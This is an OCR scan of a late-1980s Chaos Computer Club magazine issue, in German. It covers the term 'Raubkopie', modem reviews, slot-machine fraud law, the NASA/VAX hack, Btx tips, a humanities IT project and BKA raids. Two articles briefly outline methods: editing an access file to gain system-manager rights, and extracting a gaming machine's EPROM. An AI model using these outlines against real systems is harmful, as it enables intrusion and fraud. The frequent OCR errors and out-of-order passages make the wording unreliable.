“Raubkopie“ bzw. “Raubkopierer“. Denn; ES 
GIBT WEDER “RAUB“-KOPIEN, NOCH 
“RAUB“-KOPIERER! 


Ist das Koieren also frei und erlaubt? Nein, obwohl 
bei weitem nicht für jedes Programm, bei dem das 
behauptet wird, ein Urheberrechtsschutz besteht. 
Wogegen ich mich entschieden wende, ist allein der 
Begriff “Raubkopie“. Er rückt ein einfaches Ver¬ 
gehen in die Ecke des Verbrechens und der Ge- 
waltkriminalität. Denn unter Raub versteht der Jurist 
die Wegnahme einer fremden beweglichen Sache 
unter Anwendung von (körperlicher) Gewalt oder 
von qualifizierten Nötigungsmitteln, d.h unter Dro¬ 
hung mit gegenwärtiger Gefahr für Leib oder Leben. 

Dies trifft aber - wie jeder weiß - auf die sog. 
“Raubkopien“ in keiner Weise zu. Gemeint ist doch 
das illegale Ziehen von Kopien urheberrechtlich 
geschützter Progamme. Ein Programm ist aber 
schonkeine“Sache“, sondern einegeistigcLeistung. 
Sache ist nur der (dem Kopierenden gehörende) 
Datenträger, auf dem das Programm gespeichert ist. 
Das mag man vielleicht noch als übertriebenen ju¬ 
ristischen Feinsinn abtun. Dies ändert jedoch nichts 
daran, daß die illegal gezogenen Kopien nicht mit¬ 
tels Gewalt oder unter Einsatz von qualifizierten 
Nötigungsmitteln beschafft werden. Von Raub kann 
daher keine Rede sein. 

Selbst wenn ausnahmsweise einmal eine Pro¬ 
grammkopie geraubt würde, sollte man von einer 
geraubten Kopie und nicht von einer “Raubkopie“ 
sprechen. Man sagt ja auch “gestohlenes Auto“ und 
nicht “Stehlauto“. 


SntcnSd^Icubcc 



Was heisst hier 


"Falsche Eingabe " ? 


Hier wird durch den gezielten Einsatz von fälschen 
Begriffen versucht, ein vom Gesetz mißbilligtes 
Verhalten noch we it darüber hinau s zu geißeln und 
die Täter zu diskriminieren. Selbst die bei der Wahr¬ 
nehmung ihrer Interessen oft wenig zimperlichen 
Einzelhändler haben es nicht versucht - und schon 
gar nicht geschafft - die Ladendiebe als Ladeniäuber 
zu verunglimpfen. 

Unverständlicherweise muckt niemand auf gegen 
diesen Verbalterrorismus der Software-Hersteller. 
Selbst im juristischen Schrifttum und in der Recht¬ 
sprechung wird der Begriff “Raubkopie“ völlig kri¬ 
tiklos übernommen. Darum gilt mein Resp,ekt (und 
meine Verachtung) der PR-Arbeit der Söfrware- 
häuser. Gute Arbeit. Wenn die Programme auch nur 
annähernd so perfekt wie die PR wären, dann würde 
es bestimmt auch weniger “Raub“-Kopien geben... 

Stoepsel 

CLINCH/DS-RED/STOEPSEL/26.11.87/14:51/3398Z. 

Seite 14 



Stiftung Modemtest 

hat mal wieder zugeschlagen 


Modem: Lynker’s 1200 
Vertrieb; Fa. C-LOG, München 
Vorteile: kleinere Abmessungen; zwei Telephon¬ 
kabel und ein RS232-Kabel dabei. 

Nachteile: Kleines Menual (zwar sind alle Befehle 
mal erwähnt, aber die Bedeutung einiger Bits der 
Statusregister schon nicht mehr). Das Ermitteln der 
Baudrate bei Autoanswer geschieht wie beim Well- 
con mit einem 600 Baud-Cairier, manche Gegen- 
siationcn conneclen da nicht. Komischerweise 
konnte manchmal keine Box bei 300 Baud erreicht 
werden; ein Umstellen auf BELL-Norm half manch¬ 
mal. Das Modem ist etwas zu emfindlich und etwas 
zu leise (input -.SOdBrn; outppt -lOdBm). 

Wenung; Gibt besseres. 

Modem: Lynker’s 2400 

Vertrieb: Fa. C-Log, München 

Vorteile: kann 300 Baud CCITT (das ist bei einem 

2400-Baud-Modem eine Seltenheit). Kann 1200/75 

(und 75/1200) Baud. Zwei Telephonkabel und ein 

RS232-KabeI dabei. 

Nachteile: bei 1200/75 ist keine Wandlung drin, d.h., 
ihre Schnittstelle muß mit zwei unterschiedlichen 
Baudralen gefahren werden; das können leider die 
wenigsten (glücklich ist, wer da einen ST hat). Die 
Baudiatenerkennung bei Autoanswer funktioniert 
nicht richtig (laut Hersteller wird daran gearbeitet). 
Zu kleines Manual (s.o.). Keine Dipswitches am 
Modem, um eine Grundeinstellung beim Einschal¬ 
ten zu haben. Das modern ist etwas zu emfindlich 
und etwas zu leise (input -49dBm; output -lOdBm). 
Wertung: Bedingt einsatzfähig. 

Seite 15 


Modem; Lightspeed 2400c 

Vertrieb: Fa. MPI, Aachen 

Vorteile: kann 300 Baud CCnT (das ist bei einem 

2400-Baud-Modem eine Seltenheit). Kann 1200/75 

(und 75/1200) Baud. Baudratenwandlung bei 

1200/75. Gutes Manual. Helpscreen eingebaut. 

Speicher für die Konfiguratuion des Modems. Zwei 

Telephonnummem-Speicher. 

Nachteile: die Baudratenerkennung bei Autoanswer 
klappt ganz gut, nur mit einem Modem hatten wir 
Probleme (Besitzer eines Zellcon-Modems sollten 
ihr auf BELL Norm stellen, bevor sie eine Box mit 
diesem Modem anrufen). Die Erkennung der Be¬ 
setztzeichens funktioniert nicht (das 1200er bringt 
das). Im Manual ist nirgends erwähnt, wie man auf 
1200/75 stellt (“ATB2“ wußte der Vertrieb anfangs 
auch nicht aber jetzt scheint ein Beipackzettel dabei 
zu seien). Für 1200/75 mit BTX muß man das Mo¬ 
dem auf “ATXO“ stellen, sonst kriegt man keine 
Verbindung. Das Modem ist etwas zu leise (output 
-lOdBm). 

Wertung: gut (die Nachteile lassen sich mit Now- 
How aufheben). 

Bemerkung: Angeblich sind noch alte Modems des 
Typs Lightspeed 2400 - also ohne das “c“ - im 
Umlauf. Hände weg davon! 

Noch ein bißchen was über die Emfindlichkeiten 
und den Outputlevei der Modems, Er wird in dB m 
(dezibel) gemessen und ist ein Maß für die Dämp¬ 
fung einer Thlefonleitung (Postler mögen mir bitten 
meinen Dilettantismus verzeihen). Der negative 
Wert z.B. bei der Angabe des Outlevel ist ein Maß 
für die Ueberwindung der Dämpfung - je mehr ne¬ 
gativ, desto lauter (=emfindlicher) das Modem. 
Postmodems haben Werte von Output =-15dBm / 
Input = -40dBm, sind also lauter, und unemfindli- 
cher gegenüber Störungen als die Hayesmodems. 
WirbittendieHersteller,das zu berücksichtigen und 
die Modems zumindest umschaltbar zu machen. 

Ein Fehler, der bisher bei allen Hayes-Modems 
(außer LS 2400c) aufgetrefen ist: Wenn man Auto¬ 
answer hardwaremäßig (oder wie auch immer) ein¬ 
gestellt hat und der DTR auf NULL zieht, kann es 
sein, daß bei einem Anruf in dieser Zeit das Modem 
ganz kurz abhebt und sofort wieder auflegt. Was soll 
der Mist? Der einzige, der davon profitiert, ist die 
POST. Haß... Also liebe Hersteller es gibt noch was 
zu tun. 


Hackowltz 

CLINCH/SYSOP/GAST/08.11.87/21:23/3574 Z. 

SuKcnSrf,Imker 





Goldesel streck Dici. 

Computerbetfug am Automaten { 


Wege zu Wohlstand und Reichtum schienen sich 
zu eröffnen, als Zeitungen die ersten Berichte 
über “Computerfreaks“ brachten, die dem Ge¬ 
heimnis des Glücks am Spielautomaten auf die 
Spur gekommen waren. Gerüchteweise war dies 
folgendermaßen zu bewerkstelligen: Man brau¬ 
che mit dem Programm in der Hosentasche nur 
zum richtigen Zeitpunkt dem Gerät den Befehl 
“Goldesel streck Dich“ geben, und schon könne 
man mit einer Flastiktüte den Gcldsegen auf¬ 
fangen. Und das alles legal. So oder so ähnlich 
jedenfalls las sich das in einem Teil der Presse, die 
freudig das neue Thema aus dem Bereich “da¬ 
tenwütige Jugend“ aufgriff. 

Zumindest seit dem Inkrafttreten des 2. WiKG 
(Zweites Gesetz zur Bekämpfung der Wirtschafts- 
kriminalität vom 1:8.1986) kann man diesem Weg 
jedenfalls niemandem mehr als legalen Weg zur 
Vermögensbildung empfehlen. Mehr als 500 Ver¬ 
fahren sind zur Zeit - nach Informationen der Zeit¬ 
schrift “Computer und Recht“ (CR) Nr.8/1987 - in 
der Bundesrepublik in solchen Sachen anhängig. 
Wie stellt man es nun eigentlich an, dem Glück in die 
Karten zu schauen? 


I s Icchgehäuse beseitigt werden muß. Darüberhinaus 
lülU aber vor allem der Wortlaut des neuen § 202 a 
ötGB. der das Ausspähen von besonders gesicherten 
Daten unter Svafe (Freiheitsstrafe bis zu drei Jahren 
oder Geldstrafe) stellt, keinen Zweifel daran, daß es 
auch nach dieser Vorschrift sich um eine Straftat 
handelt. 

Was ist aber mit denjenigen, die z.B. eine solche 
Programmanalyse von einem Freund als absolut 
heißen Tip geschenkt bekommen haben? Müssen 
auch sic mit einem Ende hinter Gittern rechnen, 
wenn sie bei dem Versuch, ihr Taschengeld aufzu- 
bessem, ertappt wurden? Die traditionellen Vor¬ 
schriften des Strafgesetzbuches geben im Prinzip 
nicht genug her, um einen solchen Tatbestand zu 
erfassen. Diese Lücke wird jedoch durch die neuen 
Vorschriften geschlossen. 

Da gibt es z.B. die Vorschrift des Computerbetrugs, 
§268 aStGB. Abs, 1 lautet: “WerinderAbsicht, sich 
oder einem Dritten einen rechtswidrigen Vermö- 
gensvoneil zu verschaffen, das Vermögen eines an¬ 
deren dadurch beschädigt, daß er das Ergebnis eines 
Datenverarbeitungsvorgangs durch unrichtige Ge¬ 
staltung des Programms, durch Verwendung un¬ 
richtiger oder unvollständiger Daten, durch unbe¬ 
fugte Verwendung von Daten oder sonst durch un¬ 
befugte Einwirkung auf den Ablauf beeinflußt, wird 
mit Freiheitsstrafe bis zu fünf Jahren oder Geldstrafe 
bestraft.“ 



Alle moderneren Geldspielautomaten sind mit 
einem Zentralrechner (CPU) ausgestattet, der mit 
einem EPROM-Chip bestückt ist. Da don das Pro¬ 
gramm des Spielablaufs verborgen ist, ist dieses 
wertvolle Stück auch in der Regel durch ein Blech¬ 
gehäuse gegen Zugriffe oder Beschädigungen ge¬ 
schützt. Den EPROM-Chip muß man nun zunächst 
in seine Gewalt bringen, um dann das Spielepro¬ 
gramm auf einem Computer einer Analyse zu un¬ 
terziehen. Mit Hilfe dieser Analyse ist der Pro¬ 
grammablauf vorhersehbar. Die Tasten des Auto¬ 
maten lassen sich gezielt und für den jeweiligen 
Spieler nutzbringend betätigen. 

Der Gesetzgeber hat nun - vor allem in das Straf¬ 
gesetzbuch - so manche Vorschrift eingebaut, die 

unteranderemauch den experimentierfreudigen jun¬ 
gen Leuten Grenzen in der scheinbar grenzenlosen 
Welt der Daten setzt: Daß die zuvor beschriebene 
Vorgehensweise nicht legal ist, liegt auf der Hand. 
Ohne Sachbeschädigung dürfte man kaum in den 
Besitz des EPROM-Chips kommen, da ja der 
Automat abgeschlossen ist und auch das schützende 


Input-Manipulation 


Diese Vorschrift, die insbesondere auch im Hinblick 
auf die sogenannten Bankautomaten-Fälle ge¬ 
schaffen wurde, scheint auf den ersten Blick exakt 
auf unseren Fall zu passen, da die Vorschrift die 
unbefugte Verwendung von Daten ausdrücklich be¬ 
nennt. Allerdings ist mit dem Begriff der “unbe¬ 
fugten Verwendung von Daten“ die sogenannte 
Input-Manipulation gemeint, d.h., unbefugt erhal¬ 
tene Daten werden eingegeben. Davon kann nun 
nicht die Rede sein, wenn man sich lediglich in 
Kenntniss des Programmablaufs im richtigen Mo¬ 
ment die richtige Taste drückt. 






Dies ist nun der Punkt, an dem sich die Juristen zu 
streiten beginnen. So wird zu diesem Problem die 
nicht von der Hand zu weisende Meinung vertreten 
(Marion Westpfahl, CR 87, a.a.o.), daß der Gesetz¬ 
geber nicht nur die Eingabe von Daten unter Strafe 
stellen wollte. Eine unbefugte Verwendung soll auch 
dann vorliegen, wenn die Daten nicht unmittelbar 
eingegeben werden, sondern wenn nur in deren 
Kenntnis auf den Daienverarbeitungsvorgang ein¬ 
gewirkt wird. 

Mag sein, daß der Gesetzgeber daran gedacht hat. Ich 
meine Jedoch, daß hier bei der Auslegung einer 
möglicherweise nicht besonders präzise formulier¬ 
ten Vorschrift ein Schritt zu weit gemacht wird. 
Darüberhinaus kann diese weitgehende Auslegung, 
die eine Strafbarkeit nicht mehr an die unmittelbare 
Eingabe von Daten knüpft, in der Praxis erhebliche 
Beweisschwierigkeilen mit sich bringen. Man stelle 
sich nur einmal folgende Situation vor: Gustav G. 
wird von der Polizei in dem Moment am Automaten 
gestellt, als er einen größeren Gewinn macht. Eine 
Programmanalyse trägt er bei sieh. Leider verstand 
er die Analyse nicht anzuwenden und vertraute daher 
mit Erfolg allein seinem sprichwörtlichem Glück. 
Niemand wird dem Unglücklichen glauben, er habe 
sich die Kenntnisse des Programms nicht zunutze 
gemacht. “Das kann ja jeder sagen“, 
ln Erwartung solcher und anderer Schwierigkeiten 
mit dem neuen Gesetz wurde aber ergänzend ein 
Auffangtatbestand geschaffen, indem auch die “son¬ 
stige unbefugte Einwirkung“ Ablauf unter Strafe 
gestellt wurde. Nach der Maxime des Bundesver¬ 
fassungsgerichts. welches dem Gesetzgeber ans 
Herr gelegt hat, “der Vielgestaltigkeit des Lebens 
Herr zu werden“, sollte mit dieser Formulierung ein 
Tatbestand geschaffen werden, der neue und zurZeit 
noch nicht bekannte bzw. nicht vorstellbare Formen 
der Computermanipulationen erfaßt. Dieser doch 
extrem breit gefaßte Tatbestand hat zu Recht Kritik 
erfahren, da er die unter Soafe gestellteTathandlung 
nicht genau genug bestimmt. 

Was bei aller (und wohl auch berechtigter) Kritik 
unter dem Strich übrig bleibt; diese Vorschriften 
sind Realität, Es besteht kein Zweifel, daß die Ge¬ 
richte von ihnen Gebrauch machen werden. Es wird 
dann ihr Problem sein, sich z.B. mit den oben be¬ 
schriebenen Beweisschwierigkeiten herumzuschla¬ 
gen. In jedem Fall muß der “Glückspieler“, auch 
wenn er nur die Tasten drückt, damit rechnen, zu¬ 
mindest wegen “sonstiger unbefugter Einwirkung“ 
auf den Verlauf des Glücks venineilt zu werden. 

Thilo 

SnlcnSritilciiher 



Umsonst in Bildschirmtext 


Als Bildschirmtext-User fragt man sicht oft, was 
der Blüdeltexl-Scheiß eigentlich soll. Informa¬ 
tionen enden meist in Werbung (Suche Infos über 
Sri Lanka, und du landest bei Avis Autovermie¬ 
tung) und das schwachsinnige Suchverfahren 
(Baumhangc!) kommt auch nicht besonders gut. 
Da gibtsaberdoch ’nen paar (wenn auch wenige) 
Dinge umsonst oder zu Low-Cost, die man ein- 
sacken sollte. 

1) Bundespostkrams: Druckwerkerzeugnisse. Das, 
wo jeder was mit anfangen könnte, ist kostenpf¬ 
lichtig, klaro. Aber das, was schon bei der Herstel¬ 
lung Kohle kostet, gibt's umsonst. Gemeint sind 
Mikrofiches. Diese netten postkartengroßen Dias 
mit 430 Din-A4-Seitcn drauf gibts bei der Post zum 
Nulltarif. Einzelexemplar kostenlos, heißt es. Be¬ 
stellung von Einzelexemplaren im Wochentumus 
macht richtig Bock. Merkt euch mal folgende Be¬ 
stellnummern: 

652607469-4 Straßenverzeichnis der Post 
652607296-1 und 396-8 Postleitzahlverzeichnis 
652607096-9 Ortsverzeichnis 
652661596-5 Gebührentafeln 
652167596-0 Druckvwerkeverzeichnis 

2) Bundesverband Politische Bildung *51511,,. Da 
gibts allerlei hübsche Büchlein, so ca. 50 Stück, von 
der Weimarer Zeit über Adolf und Pressefreiheit... 

CLINCH/DATENREISEN/HHNET/18.09.87/00:41/1292 


Seite 16 


Seite 17 



Sicherheitsrisiken von 
Computersystemen 


Hacker schleichen sich 

Hamburg (clinch) - In der Wissenschaft ist es 
längst üblich, Informationen elektronisch unter 
Angabe der richtigen Passwörter von Computer 
zu Computer zu verschicken. Besonders die 
Kernphysiker in Forschungszentren mit ihrem 
extrem hohen Datenaufkommen sind auf Com¬ 
puterkommunikation angewiesen. 

Zudem lassen sich Daten und Programme an der 
einen Stelle aufbewahren und von außerhalb abru- 
fen. Nur so ist die Zusammenarbeit über Grenzen 
hinweg möglich. Doch das dafür geschaffene Netz 
ist hackerfreundlich: Es wurde mit dem Ziel ge¬ 
gründet, wissenschaftlichen Einrichtungen den Zu¬ 
gang zu den Weltraumbehörden NASA (USA) und 
ESA (Europa) zu verschaffen. Das Rückgrat bilde¬ 
ten die DEC-Systeme pigital Equipment) der NA¬ 
SA. Dabei wurde ein Computertyp eingesetzt, der 
unter Hackern besonders beliebt ist, weil er sich auf 
Billigcomputem besonders gut nachmachen läßt. 


Und prompt ist es passiert 


Im August dieses Jahres warnte Greg Chartrand, 
Computermanager des amerikanischen Kemfor- 
schungszencrums Fermilab in Batavia nahe Chicago 
seine Kollegen in aller Welt: .Jlacker haben im Juli 
ihre Spuren in Europa hinterlassen und breiten sich 
nun in den ÜSA aus“. Und es waren deutsche Hac¬ 
ker, die mit-„Trojanischen Pferden“ Rechenzentrum 
um Rechenzentrum eroberten, besonders in der eu¬ 
ropäischen und amerikanischen Raumfahrtfor¬ 
schung. Betroffen sind Computer des Typs VAX der 
Fa. Digital Equipment (DEC). Die Hacker konnten 
jedes Programm und jede Datei eines angegriffenen 
Systems öffnen. Keine Sicherheitsschranke hielt sie 
auf. Der jüngste „Superhack“, der zunächst nur 
stückweise bekannt wurde, gilt als der erfolgreichste 
seit der Existenz von Computern und übertrifft alle 
Befürchtungen der Experten. Zwar handelt es sich 
bloß, wie sich herausstellte, um den elektronischen 
AbfalUcorb der NASA, in den man vorgedrungen 
war, aber immerhin. 

Der Einsteig in das Netz der DEC-Anlagen war nach 
dpa verblüffend einfach. „Beim Spielen mit den 
Computern ohne böse Absicht waren die Hacker in 


in Datensysteme ein 



ein Software-Loch gefallen“, erklärte ein Sprecher 
des Hamburger Chaos Computer Clubs. Die Hacker 
meldeten sich mit dem bereits bekannten Passwort 
als Besucher beim Computer an und riefen die Liste 
mit den verschlüsselten Informationen über die Zu¬ 
griffskontrolle auf. Das Ergebnis war - wie erwartet 
- eine Fehlermeldung. Diese wurde jedoch einfach 
ignoriert und die bereits offene Datei geändert. Die 
Hacker trugen sich ebenfalls in die Liste ein und 
gaben sich damit die Zugriffsrechte des System¬ 
managers. 


Wie inzwischen bekannt wurde... 


...sind auch Teile des Computersystems der Deut¬ 
schen Forschungs-und Versuchanstalt für Luft- und 
Raumfahrt (DFVLR) in Oberpfaffenhofen bei Mün¬ 
chen betroffen. Es handelt sich dabei um Systeme 
des Typs VAX 4.4,4.5, wie der Pressesprecher in der 
Kölner Zentrale auf Anfrage einräumte. 135 Ein¬ 
heiten dieser Art seien insgesamt in neun Landern 
von Hackern „geknackt worden“. Andere Pro¬ 
gramme wurden manipuliert, um sich „unsichibai“ 
zu machen. Auf dem Bildschirm und in den Aus¬ 
drucken erschien kein Hinweis auf die Eindrin¬ 
glinge. Wie einst die alten Griechen im Inneren eines 
hölzernen Pferdes in die belagerte Stadt Troja ge¬ 
langt waren, so hatten sich jetzt die Hacker in frem¬ 
den Computern eingenistet. 


(aus: Poliieispiegel I1I87, S.245) 
CUNCH/CHAOSIREDAKTIOmö.OI.88/11:49ß370Z. 


Grundlagen für den Einsatz neuer 
Technologien in den Geisteswis¬ 
senschaften 


Prof. Dr. Ekkehard Mariens und Peier Maiussek. önivcrsiiäi 
Hamburg, Arbeiisgnippe „Seuc Technologien, Philosophie 

und mtdung " 


Kurzdarstellung des Projekts einer 
„Hermeneutischen Interessen angepaßten Technologie“ 

(HIAT) 


Das Projekt HIAT stellt sich die Aufgabe, ein 
bisher ungenutztes Wirkungspotential neuer 
Technologien für die geisleswlssenschartliche 
Forschung zu erschließen. 

Deren immernoch äußetst geringe Akzeptanz gegen 
den Einsatz compuiergestützter Hilfsmittel ist auf 
ein Akzeptabilitätsproblem zurückzufUhren: Die 
verfügbaren Technologien werden den geisteswis¬ 
senschaftlichen Forschungsinteressen grundsätzlich 
nicht gerecht. Sic sind auf die empirisch-erklärenden 
Verfahren der Naturwissenschaften zugeschnitten. 
Der hermeneutisch-verstehende Ansatz der Ge- 
istcswisscnschaflen aber setzt einer Formalisierung 
sowohl ihrer Inhalte als auch ihrer Arbeitsmethoden 
prinzipielle Grenzen. 


Der geisteswissenschaftliche 
Arbeitsplatz von morgen 


Die Anerkennung dieses paradigmaiischen Gegen¬ 
satzes muß und darf jedoch nicht in resignative 
Technikabstinenz münden. Vielmehr enthält er eine 
produküve Spannung, aus der technologische Lö¬ 
sungen für die geisteswissenschaftliche Forschung 
zu gewinnen sind. 

Unter dieser Prämisse konzipiert das hier vorge¬ 
stellte Projekt die Gestaltung des geisteswissen¬ 
schaftlichen Arbeitsplatzes von morgen. Durch eine 
praxisorientierte Gmndlagenforschung im interdis¬ 
ziplinären Dialog zwischen Geisteswissenschaftlern 
und Informatikern will es die zukunftsorientienen 
Anforderungen an neue Technologien im Sinne ge¬ 
isteswissenschaftlicher Problemstellungen formu¬ 
lieren und experimentell realisieren. 

Als Pilotstudie soll eine Software mit Expertensy- 
stemßhigkeitcn entwickelt werden, die drei Grund¬ 
typen hermencutischen Arbeitens gerecht wird und 
sie forschungsintensivierend vereinigt: interpreta- 
tive Phändmenkonstitution, sinnorientierte Re¬ 
cherche und praktische Darstellung. Diesen Vor¬ 
gaben entspricht das zu konstruieiende „Personal 
Indexing and Retrieval plus Editor“ (P.I.R.E.). 


P.I.R.E. 


Es bietet dem Geisteswissenschaftler einen indivi¬ 
duell angepaßien Zugriff auf eine Volltextdalen- 
bank, der über drei kooperierende Anwenderpro¬ 
gramme für hermeneutisches Arbeiten zu nutzen ist: 
Der „Indexer“ hilft bei der Ideenfindung und Pro¬ 
blemformulierung durch eine interaktive Dialog¬ 
führung und strukturien entsprechend den Wis¬ 
sensbestand der Datenbank vor. Das Retrieval- 
Sysiem, der „Knowledge-Navigalor", gestattet eine 
somit auf die jeweiligen Forsehungsintcrcssen zu¬ 
geschnittene Dalenselekiion. Der ..Editor“ ist ein 
Textverarbeitung.sprogramm,das die Gestaltung und 
Konzeption auch nicht hierarcliiscli gegliederter 
Texte unterstützt, wobei es sich den jeweiligen 
Indizierungs- und Selektionspräferenzen „intelli¬ 
gent“ anpaßt. Die drei Teilkomponenten arbeiten 
parallel im Multitasking-Verfahren, so daß z.B. der 
Schreibvorgang durch die Indizierungsdialoge un- 
tersiülzl werden kann und der „Knowledge Navi¬ 
gator'“ jeweils adäquates Infonuationsmaterial be- 
rcitstcllt. 

Das Knowledge Engineering fiirdas P.I.R.E. bedarf 
als Voraussetzung einer kritcriologischen Klärung 
hermeneutischer Arbeitsiechniken. Sie soll durch 
Wissenschafts- und medientheorctische Untersu¬ 
chungen zur geisteswissenschaftlichen Methodolo¬ 
gie erbracht werden. Ansätze für deren informa¬ 
tionstechnische Umsetzung bieten neuere Trends 
der KI-Forschung, die das Design von Zugangssy¬ 
stemen nach dem (hermenemischen) Modell offener 
Dialogstiukturen konzipieren. 

Der Prototyp des P.I.R.E. ist schließlich in einer 
größeren Feldstudie zu forschungsrelevanten Pro¬ 
blemstellungen daraufhin zu übeqtrüfen, ob er den 
Kriterien von HIAT genügt und ggf. entsprechend zu 
modifizieren. 

Ziel des Gesamtprojekts ist die Erarbeitung von 
Rahmenrichtlinien für die sinnvolle Verwendung 
neuer Technologien in den Gcisieswissenschaftcn. 


Snteii6tüß“'>e': 


Seite 18 Seiteis 


Siilcnttdjicubcr 





Postvertriebsstück 

C9927F 


Wenn uazusteUbar 
Aascbrifieoaiisschaitt bil 
mh aet]«r Adresse zorück 


CHAOS COMPUT» CLUfr UAheuKQ 


Eldelstcdter OUrgerhaus 
ElbgaustraN 12 2800 Hanburg 54 


Sonntag, 27,Dczenbtr 1967,09.00 Uhr 


Dia Europäische Hackerparty. 


uuntoi 

Offene Netze - Jetztl, der NASA~Couo. 
Hacker und Staat(evtl.1ive), Perspektiven 
Hacker-Szene, Mai Ibox-Uernetzuny, 
Verschlüsselung und Verschleiervny. 


Tei Ina hftegebvhrj 
Mitglieder 19.-, private Tellnehner 20.-, 
Presse 50.- 

üorannetOune durch ubtrwflsuny au# 

Konto SS >0 se - KOI Dein rofTaironnt Hantiurs 
Caelcs Altbrinsenll 

PaOfoto nitbringen! 


Chaos Conputer Club g«U. 
Schwenckestrafle 69 
2Boe Hanburg 20 


Ttu#en eae / 4te i7 i? 
BTX aCHAOft 


BTx acHAosa \ M fMw.# 

Htl^r* Infomatlonen lau#and Jn Otf 
CLINCH-Mellbos KaAturs 94 % »| i? 


Salciigrfffcubcr 


DM 3,00 


Nuimuci 2? I Mu-t/. lyxs 


®te ^aten^c^leitber 

Das wissenschaftliche Fachblatt für Datenreisende 

Ein Organ des Chaos Computer Club 




Die Beschuldigte ist /MkK aufgrund der bisherigen Ermittlungen verdächtig, 

anderen geholfen au haben* 



•/ X A\ A .T. K 11 ■^1 '1 n '■ 

H 1 tu <1 L i irc i l 

w 'r 31 I ir o .-r 3 a D ft V 

S l ü ü M IL (L L LU l QgP, Hackern sind 



Congress Critic 

Hacker im Beamtenstatus? 


Hallu CCC’ler. Ich bin nun schon seit zwei Tagen 
auPin CCCongress. Und was füllt mir auf? Die 
Sprache. 

Diese Sprache, die hier fast ausschließlich verwen¬ 
de! wird, stößt mir sauer auf. Nur noch pseudojuri- 
siische Spitzfindigkeiten und Verwaltungs- 
Sprachgehabe. Selbst wenn Uschi möchte, daß ich 
ihr beim Umstellen der Kaffeemaschine behilflich 
bin, faselt sie irgendetwas von 'Zuständigkeitsbe¬ 
reich’ und von ’Projektleitung’, Nichts gegen Uschi. 
Auf ihr Sprachgebaren aufmerksam gemacht, mein¬ 
te sie, daß sie sich halt anpasse. 

Der CCC als Schulungsorganisation für Vcrwal- 
tungsabläufe? Sicherlich ist es ganz angenehm, 
wenn einige Sachen geklärt sind und ein Mindest¬ 
maß an Handshake-Protokoll gewährleistet ist. Aber 
was zuviel ist ist zuviel! 

Es gab wohl bereits intern eine Menge an Diskussion 
über das verzweifelte Bemühen, das Chaos in den 
Griff zu kriegen. Fein. Aber was hier auf dem 
CCCongress am Rande der 'galaktischen Verein¬ 
igung ohne feste Strukturen’ als Ordnungsstruktur 
niitliiufi, ist nicht neu, sondern uralt. Ich bemerke 
ticfprovinzielle, tirdeutsche Rotes Kreuz- und frei¬ 
willige Feuerwehr-Allüren. 

Sicher ist es schön, die Infrastrukturen von o.g, 
Diensten mitbemitzen zu können. Aber lassen wir 
bitte den Verwaltungs- oder gar Kasernenton weg. 
'Wir Proleten’ werden nicht dadurch salonfähig, daß 
wir geschraubt schwafeln. Das wirkt so peinlich wie 
Frau Dr. Elisabeth Müller-Mayer im Kleinen 
Schwarzen. 

Lieber ungewaschen als parfümiert. Denn blöde 
Conipulerclubs gibt's schon genug. 


//aUvlnun 

Sniciititl|lciilicr 


die 
Nächte 

lang 

Hamburg (ccc) - Nach wurtgewaUigen Slruk- 
turdebatten über nächtliche Kongressaklivitälen 
konnte der Hausfrieden wiederhergesfcllt wer¬ 
den. 

Auslöser wardie resolute Räumung des Hackeenters 
nachts um halb drei. Die nächtliche Schichtleitiing 
sorgte gewaltfrei und resolut mit Unterstützung der 
letzten Gaste für die Einhaltung der vorher verciii- 
barien Maximalanwesenheilsquote von vier Perso¬ 
nen auf dem Kongressgelände. 

Auch das Hackcenier, wo aus aktuellem Anlaß des 
Nachts noch vor Kongressbeginn eine unangemel¬ 
dete wichtige Plattenaufbauaktion staufinden sollte, 
war Anlaufpunki der Schtchtleitung. 

Mit - wie einige meinten - berechtigter Empörung 
reagierte ein betroffener Hacker; er warf seine von 
ihm für den CCC87 mitentworfene Eintrittskarte 
von sich und verschwand im Dunkel derNacht. Zum 
Kongress ward er nicht mehr gesehen. 

Beinahe wäre auch die Nachtaufsicht des Hack- 
cenlers von der rigiden Quoienregelung betroffen 
worden. Ursache dieser nächtlichen Beschränkun¬ 
gen waren verschiedene nicht druckreife Erfahrun¬ 
gen in den Kongressnächten des Vorjahres. In einer 
längeren Organisalionsdebatlc über Chaos und 
Hamburger Preussentum wurden auch andere emp¬ 
findliche Stellen der Kongressorganisation getrof¬ 
fen. 

Zwar wurde die Festlegung genau eines resoluten 
Nacht-Veranlworlliclicn allgemein akzeptiert, 
scfchlar Diskeue..) (..Le- 

Der Vorschlag für das weitere 
Vorgehen: Außer notwendigen festgeleglen Ver- 
antwonungen mehr konstnikiive Anarchie. 


ivau 

CCCS?ICCCONaKESSIPHßSSeSrELLei28.l2.S7m7:Sl 

Seite 2 


BKA macht mobil 

Nach kurzerPause weitere Durchsuchungen 
in der Hackerszene 

Beamte des BKA haben sich erneut in die 
praktische Ausbildung begeben. Am Diens¬ 
tag Morgen gegen sechs wurden drei Hacker 
unsanftaus dem wohlverdientenSchlaf geris¬ 
sen. Mitarbeiter des BKA luden sich zum 
morgentlichen Kaffee ein und durchsuchten 
alles was irgendwie nach Technik aussah. 

Die jüngsten Ermittlungen beziehen sich auf 
ein Telefonbüchlein, daß bei vorherigen 
Durchsuchungen im November in den 
Räumen des CCC beschl.agnahmt wurde. 

Nach BKA-Angaben hat ein Hacker am 20. 
November 1986 eine Datenunterhalmng' 
mit dem für die Systempflege verantwortli¬ 
chen Systemmanager geführt. Danach wurde 
der ungebetene Gast vom Systenmianager 
aus dem System herausgeworfen. Der Sysop 
unterbrach sämtliche Zuleitungen und ver¬ 
hinderte damit jeglichen Zugang zum Rech¬ 
ner. Der Hacker sei nun über einen anderen 
Rechner in das System eingedrungen und 
habe dem Sysiemmanager sämtliche Nut¬ 
zungsrechte entzogen. Der Sysop hatte keine 
Möglichkeit mehr, auf sein System zu- 
zugreilen. 

Gegen 16.00 kristallisierte sich heraus, daß 
das BKA in sechs Orten der Bundesrepublik 
gleichzeitig eine konzertierte Aktion durch¬ 
führte. Nacii bisher vorliegenden Informa¬ 
tionen sind dies: 

1 )6.00-11,30 eine FrivatwohnunginEllerbek 
(Kreis Pinneberg) 

2) 6.15 - 17,00 eine Privatwohnung in 
Karlsruhe 

-Beoiebsräume der Universität Karlsruhe 
-Privatwohnung der Eltern des Durch¬ 
suchten in Bad Bramstedt. 

3) 6.30 - 13,00 Eine Privatwohnung in Ham¬ 
burg-Harburg 

-ebenfalls Behlebsräume des Arbeitgebers 



